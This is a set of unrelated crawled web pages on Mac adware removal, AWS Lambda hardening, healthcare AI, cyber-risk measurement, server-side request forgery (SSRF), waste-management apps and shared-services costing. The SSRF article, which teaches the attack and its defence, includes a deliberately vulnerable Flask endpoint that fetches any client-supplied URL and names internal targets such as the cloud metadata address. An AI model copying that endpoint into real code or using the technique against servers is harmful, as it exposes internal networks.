8. Look for any suspicious items that are similar to the ones in Step 4. Drag them to the Trash.
9. Repeat the process on the following non-hidden folders (without ~):
10. Lastly, go to your Finder and open the Applications Folder. Look for subfolders with the following names and drag them to Trash.
- AccessDefault Daemon
Optional : For locked files that cannot be removed, do the following:
1. Go to Launchpad, Utilities folder, open Activity Monitor.
2. Select the process you want to quit.
3. Click on Force Quit button.
4. You may now delete or remove locked files that belongs to AccessDefault adware.
Step 4 : Double-check with MBAM Tool for Mac
1. Download Malwarebytes Anti-malware for Mac from this link:
2. Run Malwarebytes Anti-malware for Mac. It will check for updates and download if most recent version is available. This is necessary in finding recent malware threats including AccessDefault.
3. If it prompts to close all running web browser, please do so. Thus, we advise you to PRINT this guide for your reference before going offline.
4. Once it opens the user interface, please click on Scan button to start scanning your Mac computer.
5. After the scan, Malwarebytes Anti-malware for Mac will display a list of identified threats, AccessDefault is surely part of it. Be sure to select all items in the list. Then, click Remove button to clean the computer.
Step 5 : Remove AccessDefault from Homepage and Search
- Open your Safari browser.
- Go to Safari Menu located on upper left hand corner, and then select Preferences.
- Under General tab, navigate to Default Search Engine section and select Google or any valid search engine.
- Next, be sure that "New Windows Open With" field is set to Homepage.
- Lastly, remove AccessDefault from the Homepage field. Replace it with your preferred URL to be set as your default homepage.
- Open Chrome browser.
- Type the following on the address bar and press Enter on keyboard : chrome://settings/
- Look for 'On Startup' area.
- Select 'Open a specific page or set of pages'.
- Click on More Actions and select Edit.
- Enter the desired web address as your home page, replacing AccessDefault. Click Save.
- To set default search engine, go to Search Engine area.
- Click on 'Manage search engines...' button.
- Go to questionable Search Engine. Click on More Actions and Click 'Remove from list'.
- Go back to Search Engine area and choose valid entry from Search engine used in the address bar.
- Run Mozilla Firefox browser.
- Type the following on the address bar and hit Enter on keyboard : about:preferences
- On Startup area, select 'Show your home page' under 'When Firefox starts' field.
- Under Home Page field, type the desired URL to replace AccessDefault settings.
- To configure default search engine, select Search on left sidebar to display settings.
- Under Default Search Engine list, please select one.
- On the same page, you have an option to Remove unwanted search engine.
Optional : If unable to change browser settings, execute these steps:
Some users complain that there is no way to change browser settings because they are grayed out by AccessDefault. In such a situation, it is important to check if there is an unwanted profile. Please do the following:
1. Quit any running applications and launch System Preferences from your Dock.
2. Under System Preferences, click Profiles.
3. Select AccessDefault or any relevant profile from the left pane. See image below.
4. At the bottom of this window, click minus [-] button to delete the account. Please refer to image above.
5. Close the Profiles window and open the affected browser to change all settings associated with AccessDefault. | <urn:uuid:4a9e9e6b-23b1-4a89-9297-fc28924a2a4c> | CC-MAIN-2022-40 | https://malwarefixes.com/remove-accessdefault/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334644.42/warc/CC-MAIN-20220926020051-20220926050051-00541.warc.gz | en | 0.824902 | 2,128 | 2.515625 | 3 |
We’re hearing more and more about services that are not based on traditional server models, such as Amazon S3 buckets—basically big buckets of storage in the cloud, and the concept of serverless computing. The good thing about what are now considered serverless services, like AWS Lambda, is that they allow developers to write and run code to deliver any type of application, functionality or backend service, with zero administration, and without having infrastructure or platforms to worry about.
AWS Lambda is among the services that fall under the compute domain of the services AWS provides, along with Amazon EC2, EBS and Elastic Load Balancing.
So how does serverless work in the real world?
A serverless application can use several cloud services to do things such as serve website content from a storage bucket, authenticate users, and handle backend calls via a server-less lambda function that accesses data stored in a relational database.
While this example is based on the AWS platform, there are similarities in other platforms such as Microsoft Azure and Google Cloud.
As you can see, this so-called serverless application isn’t really serverless, as it still has traditional server-based components, in this case a database server instance. Since serverless is usually stateless, the application needs a place to store its data, and that could be Amazon ElastiCache, S3 storage, or databases such as RDS.
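To make the Lambda part of that picture concrete, a function is just a small handler that the platform invokes on demand. The sketch below is a generic Python handler with made-up field names, not code from any particular application.
# Generic AWS Lambda handler sketch (Python runtime); field names are illustrative.
import json
def lambda_handler(event, context):
    # 'event' carries the request payload, for example from API Gateway
    name = event.get("name", "world")
    return {
        "statusCode": 200,
        "body": json.dumps({"message": "Hello, " + name}),
    }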
Based on the previous application example, let’s take a look at some of the potential vulnerabilities that could be leaving your organization exposed, along with some security considerations for your serverless application.
What are the Risks to Misconfigured AWS Lambda Functions?
- Limited or No Visibility into the Inventory of Your AWS Lambda Functions: If you do not have comprehensive visibility into your inventory, you cannot identify any publicly accessible Lambda functions, which means you cannot protect them.
- Without the ability to answer key questions you will not be able to spot malicious activity or respond effectively to incidents: How many functions do you have? Are they new functions? Should they be there? What region are they in? What AWS Identity and Access Management (IAM) role are they using? (A command sketch for building such an inventory follows this list.)
- Assigning Admin Permissions to Your Functions: Without assigning the right execution role, you cannot control the privileges assigned to your Lambda function. If you are providing administrative permissions you may be granting the role more permissions than the function really needs.
- Multiple Functions Sharing Same Execution Role: Using an AWS IAM execution role with more than one Lambda function will violate the Principle of Least Privilege (POLP). Without the right IAM execution role you cannot control the privileges that your Lambda function has.
- Tracing Not Enabled: If you are not enabling tracing through AWS X-Ray, you will not have visibility into, nor monitoring capabilities for, your AWS Lambda functions.
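As a starting point for building that inventory, the standard AWS CLI can enumerate functions per region and show the resource-based policy and configuration of any function that looks out of place. This is only a sketch; the function name and region are placeholders.
aws lambda list-functions --region us-east-1
aws lambda get-policy --function-name my-function --region us-east-1
aws lambda get-function-configuration --function-name my-function --region us-east-1
If get-policy returns a statement whose principal is "*" without a restrictive condition, the function may be invocable by anyone and should be reviewed.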
How Halo Can Help
CloudPassage Halo Cloud Secure monitors AWS Lambda functions to ensure they are properly configured and to make sure that their activity is tracked so any unusual activity can be fully understood. Halo also monitors the permissions the Lambda functions operate under to ensure minimum necessary access for specific functions.
- Identify any publicly accessible AWS Lambda functions and update their access policy in order to protect against unauthorized users that are sending requests to invoke these functions.
- Allowing anonymous users to invoke your AWS Lambda functions is considered bad practice and can lead to data exposure, data loss and unexpected charges on your AWS bill. To prevent any unauthorized invocation requests to your Lambda functions, restrict access only to trusted entities by implementing the appropriate permission policies.
- Ensure that your Amazon Lambda functions do not have administrative permissions (i.e. access to all AWS actions and resources) in order to promote the Principle of Least Privilege and provide your functions the minimum amount of access required to perform their tasks.
- The permissions assumed by an AWS Lambda function are determined by the IAM execution role associated with the function. With the right execution role, you can control the privileges that your Lambda function provisions. Instead of providing administrative permissions you should grant the role the necessary permissions that your function really needs.
- Ensure your Amazon Lambda functions do not share the same AWS IAM execution role in order to promote the POLP by providing each individual function the minimal amount of access required to perform its tasks. There should always be a one-to-one relationship between your AWS Lambda functions and their IAM roles, meaning that each Lambda function should have its own IAM execution role which should, therefore, not be shared between functions.
- The permissions assumed by an AWS Lambda function are determined by the IAM execution role associated with that function, which is why using the same IAM role with more than one Lambda function will violate the Principle of Least Privilege. By using the right IAM execution role, you can control the privileges that your Lambda function has, thus instead of providing full or generic permissions you should only grant each execution the permissions that your function really needs.
- Ensure that tracing is enabled for your AWS Lambda functions in order to gain visibility into each function’s execution and performance. With the tracing feature enabled, Amazon activates Lambda support for AWS X-Ray, a service that collects data about requests that your functions perform, and provides tools you can use to view, filter and gain insights into the collected data to identify issues as well as opportunities for optimization. (A configuration sketch follows this list.)
- With tracing mode enabled, you can save time and effort debugging and operating your functions as the X-Ray service support allows you to rapidly diagnose errors, identify bottlenecks, slowdowns and timeouts by breaking down the latency for your Lambda functions.
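For the tracing and least-privilege recommendations above, a minimal sketch looks like the following; the function name is a placeholder and the same settings can be applied through the console or infrastructure-as-code.
aws lambda update-function-configuration --function-name my-function --tracing-config Mode=Active
A dedicated execution role for that one function would then carry only the permissions it needs, for example something close to the policy below if the function only writes CloudWatch logs and X-Ray trace data.
{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow", "Action": ["logs:CreateLogGroup", "logs:CreateLogStream", "logs:PutLogEvents"], "Resource": "arn:aws:logs:*:*:*"},
    {"Effect": "Allow", "Action": ["xray:PutTraceSegments", "xray:PutTelemetryRecords"], "Resource": "*"}
  ]
}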
Learn more about how Halo Cloud Secure can give you security visibility into your inventory of your AWS Lambda functions and help you identify any that may be publicly accessible. Request a customized demo. | <urn:uuid:53db2b97-8199-4ab8-b1e7-ef487bee43fc> | CC-MAIN-2022-40 | https://fidelissecurity.com/threatgeek/archive/best-practices-for-securing-aws-lambda/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335276.85/warc/CC-MAIN-20220928180732-20220928210732-00541.warc.gz | en | 0.906693 | 1,219 | 2.546875 | 3 |
The combination of human judgment and scientific evidence has always been a part of healthcare. Artificial intelligence (AI) advancements are bringing those two aspects closer together than ever before, and the business is feeling the effects. Data-based artificial intelligence is defined as computer systems capable of performing activities that normally require human intelligence. It examines massive volumes of data, utilizing algorithms to learn how to complete tasks without being explicitly programmed.
As AI in healthcare proves to be a vital component in diagnosis, therapy, care delivery, outcomes, and cost, this capability is causing waves of change. Medical research has advanced rapidly, increasing lifespans around the world. However, as people live longer, healthcare systems face increased demand, rising expenses, and a workforce that is straining to meet the needs of its patients. Population aging, shifting patient needs, changing lifestyle decisions, and the never-ending cycle of innovation are just a few of the inescapable forces driving such demand. The ramifications of an aging population stand out among these. By 2050, one in every four people in Europe and America will be over 65, putting a strain on healthcare systems. Treating such patients is costly, and it necessitates a shift in system philosophy from episodic to continuous care.
The cost of healthcare is rising faster than general inflation. Healthcare systems will struggle to remain viable unless big structural and transformational changes are made. Health systems also require a larger workforce, but the World Health Organization estimates a global shortage of 9.9 million physicians, nurses, and midwives by 2030, even though the global economy could create 40 million new health-sector jobs by then. Not only do we need to recruit, educate, and retain additional medical professionals, we also need to make sure that their time is spent where it is most valuable: caring for patients. Meanwhile, technology-powered bots can take over the repetitive work.
Now that we are well-versed in the needs, let’s look at how AI and automation improve overall healthcare operations:
- Claims Management
An automated claims processing system can transport claims and any necessary electronic health records in real time from the provider. In addition to processing claims, automated algorithms are able to validate eligibility, benefits, provider contracts, and medical diagnostic data in real time. The health insurance communication, provider and member matching, and quality control are all handled by the claims management services provided by Smart Data Solutions. Outsourcing claims management can free up time and resources for other projects at your business.
- Appointment Setting
AutomationEdge’s new, simplified hospital booking software empowers both patients and administrative staff to enhance service delivery. The scheduling system determines the amount of time allotted for various sorts of individual visits, and the demands of the doctors determine the best times of day for patient visits. Here’s a quick summary of how to increase scheduling effectiveness and how talent management software can be useful:
- Schedule the appropriate personnel for the desired shifts.
- Allow for unconventional timetables.
- Payroll and scheduling can be combined for effective operations.
- Maintain compliance.
- Make the schedules publicly available in advance for better coordination.
- Enhance adaptability and scalability.
- Data Management
The collection of patient data from various providers and organization sources is best done by data management bots. It enables the entry of patient data by healthcare professionals into a single database where it may be safely kept, processed, and shared.
While maintaining the confidentiality and privacy of the data, health data management tools help companies to integrate and analyze medical data to increase the effectiveness of patient care and derive insights that can enhance medical outcomes.
- Billing and Reconciliation
Medical billing software helps clinics get paid more quickly, increase workflow efficiency, keep patient information up to date, and reduce paperwork while establishing efficient digital workflows for crucial activities.
Predictive analytics can help support medical decisions and actions and prioritize administrative tasks to improve care. Another area where AI is starting to take root in healthcare is using predictive modeling to identify individuals at risk of getting a condition – or having one worsen – as a result of lifestyle, ecological, genomic, or other factors.
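To make the predictive-modeling idea more tangible, the sketch below trains a toy risk classifier on synthetic, made-up patient features using scikit-learn. It is purely illustrative: real clinical risk models require carefully curated data, validation, and governance far beyond this.
import numpy as np
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.metrics import roc_auc_score
from sklearn.model_selection import train_test_split
rng = np.random.default_rng(0)
# Hypothetical features: age, BMI, prior admissions, and similar signals.
X = rng.normal(size=(1000, 6))
y = (X[:, 0] + 0.5 * X[:, 2] + rng.normal(scale=0.5, size=1000) > 0.8).astype(int)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=0)
model = GradientBoostingClassifier().fit(X_train, y_train)
risk_scores = model.predict_proba(X_test)[:, 1]   # probability of the at-risk class
print("AUC on held-out data:", round(roc_auc_score(y_test, risk_scores), 3))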
Apart from these basic areas of improvement, let’s consider another area of healthcare where AI turns out to be the hero. The most common use of AI in healthcare involves NLP applications that focus on understanding and classifying clinical documentation. NLP systems can assemble unstructured clinical notes on patients, providing valuable insight into care quality, improving methods, and achieving better results for patients.
The Concluding Note
The greatest challenge to implementing AI in healthcare is not whether the technologies are capable enough to be leveraged but rather ensuring their easy adoption in day-to-day clinical practices. In time, clinicians may prefer migrating toward tasks that require uniquely human skills and cognitive function with the highest level of innovation and an analytical approach. Perhaps the only healthcare providers who will lose out on the optimum potential of AI in healthcare may be the ones who refuse to work alongside it.
Still curious about how AI can be implemented across the healthcare industry? Contact us for a FREE DEMO. AutomationEdge is a leading provider of Conversational RPA and Conversational AI and automation solutions. | <urn:uuid:92cae070-cc7c-4e73-a312-1753aeaf8f82> | CC-MAIN-2022-40 | https://automationedge.com/blogs/ai-the-tech-medicine-ameliorating-the-healthcare-industry/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00541.warc.gz | en | 0.920255 | 1,091 | 2.6875 | 3 |
Technology can’t help falling into the wrong hands. It is available to security experts and cyber attackers alike. Despite persistent efforts by organizations worldwide to strengthen security protocols, over $4.1 billion was lost to cybercrime in 2020-21 alone.
From small phishing attacks to organization-wide shutdowns, even a minor system breach can do a lot of damage. Monitoring information security efficiency is a key performance indicator for businesses. It helps them articulate the problems and lay down safety nets to lower the probability of a potential breach. But how do you actually measure cybersecurity risk?
Dive in to find out!
Cybersecurity Risk: At a Glance
Cybersecurity risk tells you how likely an online business is to lose money, personal data, or internal assets due to unauthorized access which breaks confidentiality. To put it another way, it gives you the amount of exposure/vulnerability your business has when it comes to networks, devices, and cloud-based systems.
While bigger companies hire dedicated security experts to oversee their operations, smaller organizations often fall prey to data loss, squandered funds, or constant downtime due to a security breach. This can impact sales and brand value, and even erode your customers’ trust in the brand.
We can measure this risk using conventional forecasting or statistical analysis, but before we do that, let us look at the ways through which we can assess risks.
How to Measure Cybersecurity Risk?
To quantify cybersecurity risk, you can use a framework that relies on threat, the value of the information at risk, and vulnerability. It is worth noting that even though the terms ‘vulnerability’ and ‘cyber risk’ might sound the same, they are not. A vulnerability is a flaw that leads to unauthorized network access, whereas ‘cyber risk’ describes the probability of that vulnerability being exploited.
The formula to measure Cyber Risk = Threat x Information value x Vulnerability
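To show how the formula can be applied in practice, here is a minimal Python sketch that scores a few made-up assets on a 1-10 scale for each factor and ranks them; the asset names and ratings are purely illustrative.
assets = [
    # (name, threat, information value, vulnerability), each rated 1-10
    ("Customer database", 8, 9, 6),
    ("Public marketing site", 6, 2, 7),
    ("Payroll system", 5, 8, 3),
]
def cyber_risk(threat: int, info_value: int, vulnerability: int) -> int:
    # Cyber risk = threat x information value x vulnerability (maximum 1000).
    return threat * info_value * vulnerability
for name, t, iv, vu in sorted(assets, key=lambda a: cyber_risk(*a[1:]), reverse=True):
    print(f"{name:22s} risk score = {cyber_risk(t, iv, vu)}")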
Here are the steps you need to follow when measuring cybersecurity risk:
Step 1: Value derivation
Firstly, you need to start with a system-wide assessment of security weaknesses and then assign a security level to them. Imagine a scenario where you do get hacked: which assets could cause the most damage if lost?
Prioritize the information you want to keep safe in the same way you prioritize day-to-day tasks. Note how the loss of a certain database may affect the company as a whole, brand value, and finances. Put yourself in the shoes of a third person and evaluate the loopholes which could be used to gain improper access or deter the smooth functioning of your systems.
Once this is done, lay out a rating system (1-10, 1 being extremely low-risk) for different areas of your business to check if the existing systems suffice or not.
7-10: You need to implement a lot of changes in these systems and install various barriers to lower the possibility of a cyber-attack.
3-6: Moderate-level risks that can be fixed via small adjustments.
1-2: In these areas, highly effective security systems are already laid out. They only require regular firmware updates to function properly.
Step 2: Focusing on Vital Assets
Use audit reports or software security analysis teams to prepare an assessment report. This will help the managers identify the areas which need improvement and have a high likelihood of being hacked. Vital assets can vary from one company to another.
This can include everything ranging from trade secrets, patents, and employee data to hardware, strategy, or security policies. A routine assessment of the activities of all the employees who have access to crucial information is also necessary.
Step 3: Deploying Protective Barriers
Once the vulnerabilities have been discovered, an organization should immediately put safety nets in place to increase security. Be it a revision of company policies, getting rid of outdated tools, or demotion of certain individuals, you must keep the interests of the company as a whole in mind.
Changes can be further implemented by sticking to military-grade encryption for data, deploying two-factor authentication to prevent unknown logins, and configuring a virtual private network (VPN) when accessing public networks.
Look for software security companies that provide intrusion detection mechanisms and automatic updates so that you can focus on operations without worrying about the risk of cyber hacking.
Statistical analysis is another way to measure cybersecurity risk, by collecting data and identifying meaningful patterns. Unlike conventional methods, this process gives an accurate risk-to-safety ratio. You can use software like RStudio, SPSS Statistics, and TIMi Suite for statistical analysis.
Types of Security Threats
With the recent shift of working professionals to remote work, we now rely heavily on our systems to keep our data secure. This has also opened the doors for cyber criminals to exploit loopholes and bypass security measures. Whether you seek the assistance of an independent consultant or have an in-house IT team, these are a few forms of corporate cybersecurity risk that you should steer clear of:
Malware is essentially software that is designed to bring a system down by gaining unauthorized access to the network. Each type of malware is different and is designed to target a different aspect of a system, for instance payment gateways, spyware on landing pages, or spam email sign-up forms.
- Adware: This software displays repetitive adverts on the user’s screen. Though not dangerous in itself, spammy adverts can slow down your website and redirect visitors to other, more dangerous threats.
- Viruses: Viruses are commonly installed with files and can spread across multiple systems quickly. This can be countered by having a robust enterprise-wide antivirus system.
- Fileless malware: This malware does not rely on an executable file, but instead abuses built-in platforms such as PowerShell, MS Office macros, and other system apps.
- Worms: Much like a virus, worms spread quickly from one system to another but are targeted at specific databases instead of the entire system. Keeping your systems updated with the latest patches and firewalls is one way to stay safe.
- Trojans: This software tricks the user into installing or executing it while giving the false impression that it poses no harm.
- Bots: Bots work in an automated manner and form a botnet through which a hacker can control multiple systems and launch larger attacks.
- Ransomware: This involves stealing the data of an enterprise, followed by threats of deletion unless the user pays a ransom to the hacker.
- Spyware: Spyware is used to monitor user activity and send the information to third parties such as marketing channels. It can also compromise your passwords and personal data.
In this illegal practice, known as cryptojacking, a hacker uses another person’s computer to mine cryptocurrency without their knowledge or consent. The crypto mining software typically runs in the background and is hidden within the system. This method of cyber-hacking accounted for a loss of $52 million in the first four months of 2022.
Phishing attacks involve emails and text messages from anonymous accounts that include a link to a fake offer. As soon as the user clicks on such a link, they are redirected to a phishing website. These attacks might also involve active human participation, for example someone pretending to be from the IT department and asking you to disclose personal data.
Complex forms of these attacks include MITM attacks, DDOS attacks, and APT attacks. Learn more about the common cyberattacks to look out for.
Evaluating cybersecurity risk is a fairly arduous process, but it is essential given the potential for data loss.
You can start by identifying the key problems in your system and then sorting them accordingly. Once this is done, deploy software that automates updates and keeps attacks at bay.
> Learn more on how to become a Certified Information Security Manager (CISM).
> Learn more on how to become a Certified Cloud Security Professional (CCSP).
Thank you for reading my blog.
If you have any questions or feedback, please leave a comment. | <urn:uuid:81b2db59-1167-45e6-8d53-3ea33592d7d0> | CC-MAIN-2022-40 | https://charbelnemnom.com/measure-anything-in-cybersecurity-risk/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00541.warc.gz | en | 0.923421 | 1,708 | 2.8125 | 3 |
A Server Side Request Forgery (SSRF) attack gives an attacker the ability to use your web application to send requests to other applications running on the same machine, or to other servers which can be on the same or on a remote network. Since the requests are being piggybacked via your server, the target might let its guard down, allowing requests which would otherwise not be possible from an untrusted source.
In this article, we take a deep look at two types of SSRF – Trusted SSRF and Remote SSRF – as discussed by Alexander Polyakov and Dmitry Chastuhin at Blackhat Security (PDF).
Trusted Server Side Request Forgery
Trusted Server Side Request Forgery forges requests over predefined trusted connections, using trusted links from which the attacker sends requests. In order to perform such an attack, the attacker must have access either to the application itself or to a vulnerability that can be used to perform the attack.
An example of a Trusted SSRF attack using an Oracle Database with public rights can be seen below:
SELECT * FROM myTable@HostX
The use of an Oracle trusted link enables the attacker to send requests to and receive responses from ‘Host X’. This type of SSRF attack would not raise any alerts since HostX is configured to trust connections from the Oracle database.
There are some stumbling blocks for the attack to be successful. The attacker would need to make use of reconnaissance techniques to identify the existence of Host X. The attacker would also require a trusted connection to the database, which can be achieved by exploiting other vulnerabilities such as SQL injection, and incorrectly configured access control for the database user used by the web application.
Remote Server Side Request Forgery
Remote Server Side Request Forgery allows an attacker to initiate connections and make requests to any remote server, directly from the vulnerable web application or web service. The attacker can thus use the vulnerable server to perform port scans, initiate attacks to other hosts, and perform any other type of malicious activity on other servers using the vulnerable server.
From the attacker’s point of view, this presents various advantages. These include the ability to better conceal malicious actions, the ability to use the processing power of the vulnerable server to initiate other attacks, and the possibility of using a farm of servers, which might be running the same vulnerable software, as a launch pad of a distributed attack.
SSRF attacks can be initiated through various vulnerabilities. These vulnerabilities can be classified in different groups such as the processing of an XML file format through XML External Entities (XXE). SSRF attacks can also be initiated by direct sockets access through CRLF injection, by processing URLs of a net library such as cURL or the ASP.NET URI, and by making use of links to external data in databases such as PostgreSQL.
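To ground this, the sketch below shows the most common way a remote SSRF bug is introduced in application code, a server-side fetch of a client-supplied URL, together with one possible mitigation based on an allowlist. It is written in Python/Flask purely for illustration; the hostnames are hypothetical, and a production fix would typically add scheme, IP, and redirect checks as well.
from urllib.parse import urlparse
import requests
from flask import Flask, abort, request
app = Flask(__name__)
ALLOWED_HOSTS = {"images.example.com", "cdn.example.com"}
@app.route("/fetch-vulnerable")
def fetch_vulnerable():
    # DANGEROUS: the server fetches whatever URL the client supplies, which may
    # point at internal hosts such as http://169.254.169.254/ or http://localhost:8080/admin.
    return requests.get(request.args["url"], timeout=5).text
@app.route("/fetch-safer")
def fetch_safer():
    url = request.args["url"]
    parsed = urlparse(url)
    if parsed.scheme != "https" or parsed.hostname not in ALLOWED_HOSTS:
        abort(400, "URL not permitted")
    return requests.get(url, timeout=5).text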
In this article, we have seen how Server Side Request Forgery (SSRF) vulnerabilities may be used as a gateway through your firewall into your internal network or to launch attacks against third-party systems.
Acunetix Web Vulnerability Scanner can detect SSRF vulnerabilities through its AcuMonitor service. When a scan is performed on a website, Acunetix WVS will inject various payloads instructing a vulnerable server to make HTTP requests to the AcuMonitor server. Acunetix WVS will then verify if the server has indeed performed the requests as instructed. Acunetix WVS will then provide information about the HTTP request that was performed such as the IP address of the server that made the request and the page where the payload was injected.
Get the latest content on web security
in your inbox each week. | <urn:uuid:9f3db02a-856f-475f-a2ec-18f586b99819> | CC-MAIN-2022-40 | https://www.acunetix.com/blog/articles/trusted-remote-server-side-request-forgery-attacks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00541.warc.gz | en | 0.917395 | 772 | 2.8125 | 3 |
How to Build a Reliable Waste Management and Segregation App
by Smitesh Singh, on Nov 9, 2021 9:39:38 PM
Gone are the days when technology was just an economic propellant. Today technology through its unprecedented potential is actively playing a major role in the global environmental crisis such as climate change and waste management. According to research, without effective waste management, there will be more plastic in the oceans than fish by 2050. Government and public authorities are therefore actively looking for cost effective digital solutions to make the dream of a cleaner and greener planet a reality. In this blog, we will talk about how technology is helping rural and urban areas to manage waste and foster a cleaner industrial era.
Locating nearest recycling centers
Apps can help governments spread awareness about the benefits of recycling and redirect users to various recycling centers. The APIs from these apps can also be integrated into digital marketplace apps to help their end users manage the waste generated from buying their products. The app helps users locate the nearest recycling centers in their vicinity and teaches them different DIY approaches to recycling.
Segregate types of waste materials
Domestic and industrial waste is a mix of various biodegradable and non-biodegradable materials that need to be segregated in order to be processed suitably. There are different kinds of plastics, some of which are recyclable and some of which are not. Mistakes in sorting waste lead to improper disposal, and manual monitoring can be inefficient and expensive. AI/ML object-recognition models, when implemented in apps, can help users identify plastics and their types, pick out the right recyclable plastics, and learn about the profitability of recycling them.
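As a rough sketch of what the object-recognition piece could look like on the app side, the Python code below wires a small image classifier to a hypothetical list of waste categories. The class list is invented and the model weights here are untrained placeholders; a real app would load a model fine-tuned on labelled waste imagery.
import torch
from PIL import Image
from torchvision import models, transforms
CLASSES = ["PET plastic", "HDPE plastic", "non-recyclable plastic",
           "glass", "metal", "paper", "organic"]
model = models.mobilenet_v3_small(weights=None)   # small enough for mobile use
model.classifier[-1] = torch.nn.Linear(model.classifier[-1].in_features, len(CLASSES))
model.eval()
preprocess = transforms.Compose([
    transforms.Resize(256), transforms.CenterCrop(224), transforms.ToTensor(),
])
def classify(image_path: str) -> str:
    image = preprocess(Image.open(image_path).convert("RGB")).unsqueeze(0)
    with torch.no_grad():
        probabilities = model(image).softmax(dim=1)[0]
    return CLASSES[int(probabilities.argmax())]
# Example (once the model is trained): classify("photo_of_bottle.jpg") -> "PET plastic"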
Wiki for waste management
The waste management app can help users obtain insights on basics of waste management and go ahead with the first steps in their waste management journey. The app can also function as a waste payment app at various recycling facilities as well as a way to access local data and waste management policies. Moreover, people can also use this app to monitor and track waste pickups. Therefore, it makes it easy for users to keep track of the amount they spend on disposing of trash.
Identify non-recyclable wastes
Apps can help users identify waste materials that are hard or impossible to recycle, and route them to the right places. The app can also act as a news portal that provides users with environmental trends and news. Users can track their contribution to recycling drives, campaigns, and similar initiatives in the app, which also broadcasts waste management and recycling news, policies, and information. Another feature is reminders for waste collection and recycling dates. Waste management apps can use AI assistants like Google Assistant and Amazon Alexa to help users access waste management and recycling information.
IoT based Smart Dustbins
A number of companies have started producing smart bins that can handle a variety of tasks. Many include sensors that detect fill levels and send alerts when bins are overflowing. This data can help users track their disposal habits while optimizing pickup schedules and reducing fuel consumption. These trash cans can also be built with interactive screens that guide users in good waste management practices, helping people learn how to dispose of items of different material types. This way, users become aware of what can be thrown away and what can be recycled.
Fleet Management Systems
Technology can level up trash pickup for underdeveloped areas through fleet management. Digital fleet management is prominent in the logistics industry, but it can also significantly aid garbage collection. These systems use networked sensors along with GPS data to devise vehicle routes. Taking the same route every day is easy, but it isn’t always efficient: fluctuating traffic, weather, and waste quantity mean that different routes can be more optimal and cost-saving. Fleet management systems, when available on smartphones, allow drivers to adjust their routes to save time and reduce emissions.
As people adopt newer technologies, additional research and development is taking shape. As the technology progresses, and automation is becoming ubiquitous, there is expected to be an exponential surge in waste management technology. The forthcoming era that needs technological and smart solutions to take up manual and mechanical tasks of waste management or at the least aid people in doing it effectively. In order to start your journey with apps for sustainable waste management, get in touch with a waste management app development company. | <urn:uuid:04da37e6-c6d5-4e40-a908-cf9b77b0b904> | CC-MAIN-2022-40 | https://blog.datamatics.com/how-to-build-a-reliable-waste-management-and-segregation-app | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00541.warc.gz | en | 0.94069 | 906 | 3.03125 | 3 |
What is cost transparency?
To put it simply, Cost Transparency is a term used to describe the tracking within the organisation of the total cost required to provision and maintain products and services for the benefit of the enterprise. It is also about establishing what different products and services exist, what they cost and how they relate to each other and to the business.
If one considers that a Shared Services unit provides a range of administrative and support services, along the lines of IT, HR and finance to the entire organisation, it has never been more important for both the unit delivering and those receiving such services to completely understand the costs associated with this.
Cost transparency is the answer, as it is designed to provide business, finance and shared service owners with detailed and meaningful insights into their respective areas. It creates both visibility and understanding of the costs and volumes of their entire shared service product and service portfolio, enabling the organisation to make informed and fact-based strategic and tactical decisions concerning its shared service investments.
Cost transparency enables Shared Services to move beyond merely delivering a product or service to a business unit, to the point where it is actually able to quantify the value obtained from such a delivery.
Shared Services cost transparency is all about showing the business:
- What services it consumes
- The cost of delivering these services
- Providing a granular breakdown of costs according to activities
- Offering clarity around the resources involved in producing these services
What are shared services?
Typically, shared services encompass operations like HR, IT, Finance, Procurement, Legal Services, Marketing, and Sales. Business operations that used to be shared by several units within the business are consolidated under the Shared Services umbrella in order to eliminate redundancies and inefficiencies, with individual business units effectively becoming internal clients.
Since there will always be multiple business units in an organisation using services provided by the shared service centre, there are obvious gains in efficiency and reduction in costs. These services are then charged back to the business units that require them.
What is business demand?
Business demand is the requirement that revenue-generating business units place on their shared service providers – both internal and outsourced external ones – to enable their business operations. This could encompass any number of services, including such diverse ones as real estate from which to conduct business, through to IT platforms or other products and services that allow business to operate and transact.
Business often tends to think demand is one sided, as it is the entity ultimately footing the bill, and Shared Services simply needs to deliver on all requests. However, the reality is that all areas within the enterprise, including Shared Services, have a fixed capacity and a limited supply from which to meet all these demands. However, Shared Services departments are best placed to know the business ins and outs, and are thus well positioned to choose which technologies or services they can contribute to enable their internal customers business strategies, while still remaining agile and flexible enough to accommodate business needs.
Why correct behaviour is so important in large organisations
It is important to understand that shared service areas, or centralised functions, often have strategies developed for the enterprise they service that, as a whole, they wish to pursue and see manifested throughout the organisation.
In large companies, there are often divisional or region-specific behaviours which can conflict with overall corporate goals. A good example of such conflict can be considered in the following example:
A large business occupies multiple buildings in a central business district. One of these edifices is shiny, new and expensive, while another is a building the company already owns, but which is now ageing. Management agree that there is adequate capacity for the older building to house the staff of both buildings, and since a lease break on the new building is coming up, they take the decision to consolidate into a single building that will offer better value.
The best behaviour for the company to encourage is a swift move and consolidation into the one better value, yet ageing building. However, unless an incentive is offered to those in the newer, smarter premises, they will be far less likely to want to switch buildings, and will thus most likely drag their feet. An eloquent solution would therefore be to establish a subsidised recharge for early adopters, and use a commercial incentive to drive quicker adoption of this particular business strategy.
How can shared services influence business demand and behaviours while satisfying the business and its strategic aspirations?
The simplest and easiest manner to achieve this is to utilise the laws of supply and demand, and just like any good market place, both of these factors will need to come into play to reach a dynamic constantly evolving equilibrium. This should be a driving force when creating pricing around Shared Services.
It is necessary that the cost of the services being consumed is felt by the consuming business, and the best way to ensure this is by instituting a meaningful, trusted and accurate chargeback or show-back model to establish commercial awareness and incentives linked to consumption. The old adage that there’s no such thing as a free lunch is very true in this context.
